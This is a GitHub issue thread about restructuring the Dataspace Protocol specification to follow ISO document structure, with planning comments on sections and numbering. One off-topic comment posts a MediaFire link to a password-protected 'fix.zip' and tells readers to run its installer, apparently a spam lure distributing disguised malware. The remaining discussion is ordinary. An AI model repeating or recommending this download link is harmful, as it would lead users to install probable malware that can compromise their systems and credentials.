### ISSUE TITLE
Restructure document following ISO style

### ISSUE THREAD

**Issue by ssteinbuss** [eclipse-dataspace-protocol-base/DataspaceProtocol#22]
The specification needs to follow the structure of an ISO standard to be successful in the PAS process. 

See also [ISO templates](https://www.iso.org/iso-templates.html)

and the [ISO directive part 2](https://www.iso.org/sites/directives/current/part2/index.xhtml)

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sebbader-sap** [comment]
We need to align this task with any, potentially in parallel, ongoing content-wise work to not screw up each others states. Nevertheless, we other tasks shall not be blocked through this here now. @ssteinbuss please assure that you have the other work content merged in main before starting here.

**Comment by ssteinbuss** [comment]
Required next steps to solve this issue:

- [ ] Apply structural changes by adding mandatory sections,( add foreword, introduction, scope, terms and definitions
- [ ] Add clauses (to be done in a separate issue)
- [ ] Check numbering
